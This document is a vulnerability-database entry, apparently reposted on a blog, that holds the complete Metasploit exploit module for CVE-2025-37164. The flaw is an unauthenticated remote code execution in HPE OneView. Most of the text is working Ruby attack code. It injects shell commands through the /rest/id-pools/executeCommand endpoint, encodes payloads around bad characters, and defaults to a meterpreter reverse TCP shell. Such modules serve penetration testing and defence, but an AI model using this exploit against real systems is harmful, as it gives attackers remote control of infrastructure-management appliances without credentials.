{“lastseen”:”2025-12-20T19:04:50″,”description”:”This module exploits an unauthenticated RCE vulnerability, CVE-2025-37164, against Hewlett Packard Enterprise HPE OneView. All versions below 11.00 are vulnerable so long as the vendor supplied hotfix has not been applied, however some VM product…”,”published”:”2025-12-20T18:55:10″,”modified”:”2025-12-20T18:55:10″,”type”:”metasploit”,”title”:”HPE OneView unauthenticated RCE”,”source”:””,”references”:””,”id”:”MSF:EXPLOIT-LINUX-HTTP-HPE_ONEVIEW_RCE-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-37164″],”sourceData”:”##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nclass MetasploitModule \\u003c Msf::Exploit::Remote\\n Rank = ExcellentRanking\\n\\n include Msf::Exploit::Remote::HttpClient\\n prepend Msf::Exploit::Remote::AutoCheck\\n\\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘HPE OneView unauthenticated RCE’,\\n ‘Description’ =\\u003e %q{\\n This module exploits an unauthenticated RCE vulnerability, CVE-2025-37164, against Hewlett Packard Enterprise\\n (HPE) OneView. All versions below 11.00 are vulnerable (so long as the vendor supplied hotfix has not been\\n applied), however some VM product versions do not enable the vulnerable \\”ID Pools\\” endpoint, and are not\\n exploitable.\\n },\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘Author’ =\\u003e [\\n # Original finder\\n ‘Nguyen Quoc Khanh’,\\n # Analysis and exploit\\n ‘remmons-r7’,\\n ‘sfewer-r7’\\n ],\\n ‘References’ =\\u003e [\\n [‘CVE’, ‘2025-37164’],\\n # Vendor advisory\\n [‘URL’, ‘https:\/\/support.hpe.com\/hpesc\/public\/docDisplay?docId=hpesbgn04985en_us\\u0026docLocale=en_US’],\\n # Rapid7 ETR blog\\n [‘URL’, ‘https:\/\/www.rapid7.com\/blog\/post\/etr-cve-2025-37164-critical-unauthenticated-rce-affecting-hewlett-packard-enterprise-oneview\/’],\\n # Rapid7 Analysis\\n [‘URL’, ‘https:\/\/attackerkb.com\/topics\/ixWdbDvjwX\/cve-2025-37164\/rapid7-analysis’]\\n ],\\n ‘DisclosureDate’ =\\u003e ‘2025-12-16’,\\n ‘Privileged’ =\\u003e false, # Executes as trm3.\\n ‘Platform’ =\\u003e [‘unix’, ‘linux’],\\n ‘Arch’ =\\u003e [ARCH_CMD],\\n ‘Targets’ =\\u003e [\\n [\\n # Successfully tested with the following payloads against OneView 6.60.07:\\n # cmd\/unix\/reverse_ncat_ssl\\n # cmd\/linux\/http\/x64\/meterpreter_reverse_tcp\\n ‘Default’, {\\n ‘Payload’ =\\u003e {\\n ‘BadChars’ =\\u003e ‘\\”\\\\’ ‘,\\n ‘Encoder’ =\\u003e ‘cmd\/ifs’\\n },\\n ‘DefaultOptions’ =\\u003e {\\n ‘PAYLOAD’ =\\u003e ‘cmd\/linux\/http\/x64\/meterpreter_reverse_tcp’\\n }\\n }\\n ],\\n ],\\n ‘DefaultTarget’ =\\u003e 0,\\n ‘DefaultOptions’ =\\u003e {\\n ‘RPORT’ =\\u003e 443,\\n ‘SSL’ =\\u003e true\\n },\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘Reliability’ =\\u003e [REPEATABLE_SESSION],\\n ‘SideEffects’ =\\u003e [IOC_IN_LOGS]\\n }\\n )\\n )\\n\\n register_options([OptString.new(‘TARGETURI’, [true, ‘Base path’, ‘\/’])])\\n end\\n\\n def check\\n # We can pull out the current REST API version number and correlate it back to a major.minor product number\\n # based on known values. This is informational only, the check routine will leverage the vulnerability to\\n # identify if the target si actually vulnerable. This is due to the vulnerability not being present on\\n # some VM versions due to the ID Pool endpoints being disabled.\\n res_ver = send_request_cgi(\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘rest’, ‘appliance’, ‘version’)\\n )\\n\\n return CheckCode::Unknown(‘Connection to \/rest\/appliance\/version failed’) unless res_ver\\n\\n return CheckCode::Unknown(\\”Unexpected \/rest\/appliance\/version response code #{res_ver.code}\\”) unless res_ver.code == 200\\n\\n json_ver = JSON.parse(res_ver.body)\\n\\n version_string = ‘Detected ‘\\n version_string += json_ver[‘modelNumber’] || ‘HPE OneView’\\n version_string += ‘ version ‘\\n version_string += json_ver[‘softwareVersion’] || ‘unknown’\\n\\n # We leverage the command execution vulnerability to execute a benign command. We test that this command executed\\n # successfully below. Note, we aren’t checking the stdout, so we cannot do a proof-of-execution check like\\n # \\”echo $((1+2))\\” and then test for the result of \\”3\\”.\\n cmd = \\”echo #{SecureRandom.uuid}\\”\\n\\n res = execute_cmd(cmd, shell: false)\\n\\n return CheckCode::Unknown(\\”#{version_string}. Connection failed\\”) unless res\\n\\n # The vendor hotfix adds an HTTP rewrite rule to force the target endpoint as 404.\\n # Some Virtual Machine based product versions don’t support ID Pools, so report 404 for the missing endpoint.\\n return CheckCode::Safe(\\”#{version_string}. Target endpoint returned response code #{res.code}\\”) if res.code == 404\\n\\n return CheckCode::Unknown(\\”#{version_string}. Unexpected response code #{res.code}\\”) unless res.code == 200\\n\\n j = JSON.parse(res.body)\\n\\n return Exploit::CheckCode::Vulnerable(version_string) if (j[‘type’] == ‘ExecutableCommand’) \\u0026\\u0026 (j[‘cmd’] == cmd) \\u0026\\u0026 (j[‘result’] == true)\\n\\n CheckCode::Unknown(\\”#{version_string}. Unexpected JSON results\\”)\\n rescue JSON::ParserError\\n return CheckCode::Unknown(‘Failed to parse JSON body’)\\n end\\n\\n def exploit\\n res = execute_cmd(payload.encoded, shell: true)\\n\\n fail_with(Msf::Exploit::Failure::UnexpectedReply, ‘Connection failed’) unless res\\n\\n fail_with(Msf::Exploit::Failure::UnexpectedReply, \\”Unexpected response code: #{res.code}\\”) unless res.code == 200\\n\\n j = JSON.parse(res.body)\\n\\n fail_with(Msf::Exploit::Failure::UnexpectedReply, ‘Response is not of type ExecutableCommand’) if j[‘type’] != ‘ExecutableCommand’\\n\\n # If Runtime.getRuntime().exec succeeds, the \\”result\\” will be true. If an IOException was thrown, this is caught and\\n # the \\”result\\” will be false. So we can use this to see if our payload command executed successfully or not.\\n # We dont fail_with() but rather print_warning() in case the payload executed before the failure\\n # occurred (i.e. during cleanup).\\n if j[‘result’] == false\\n print_warning(‘Command execution returned a result of false, likely due to an unexpected IOException server-side’)\\n end\\n rescue JSON::ParserError\\n fail_with(Msf::Exploit::Failure::UnexpectedReply, ‘Failed to parse JSON body’)\\n end\\n\\n def execute_cmd(cmd, shell:)\\n send_request_cgi(\\n ‘method’ =\\u003e ‘PUT’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘rest’, ‘id-pools’, ‘executeCommand’),\\n ‘ctype’ =\\u003e ‘application\/json’,\\n ‘data’ =\\u003e {\\n # As this is in JSON, we cannot have \\” or ‘ characters. We mark these as BadChars so Metasploit will use an\\n # encoder to avoid them. To shell out to \/bin\/sh -c we need to wrap the arguments in quotes. As we cannot do\\n # this, we also mark a white space as a BadChar, and use the IFS encoder to encode them. This lets us use\\n # arbitrary Metasploit command payloads successfully via an unquoted \/bin\/sh -c PAYLOAD\\n ‘cmd’ =\\u003e shell ? \\”sh -c #{cmd}\\” : cmd,\\n ‘result’ =\\u003e false\\n }.to_json\\n )\\n end\\nend\\n”,”sourceHref”:”https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/exploits\/linux\/http\/hpe_oneview_rce.rb”,”cvss”:{“score”:10,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:C\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.rapid7.com\/db\/modules\/exploit\/linux\/http\/hpe_oneview_rce\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-12-20T19:04:50″,”description”:”This module exploits an unauthenticated RCE vulnerability, CVE-2025-37164, against Hewlett Packard Enterprise HPE OneView. All versions below 11.00 are vulnerable so long as the vendor…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,36,12,169,13,7,11,5],"class_list":["post-32363","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-100","tag-exploit","tag-metasploit","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n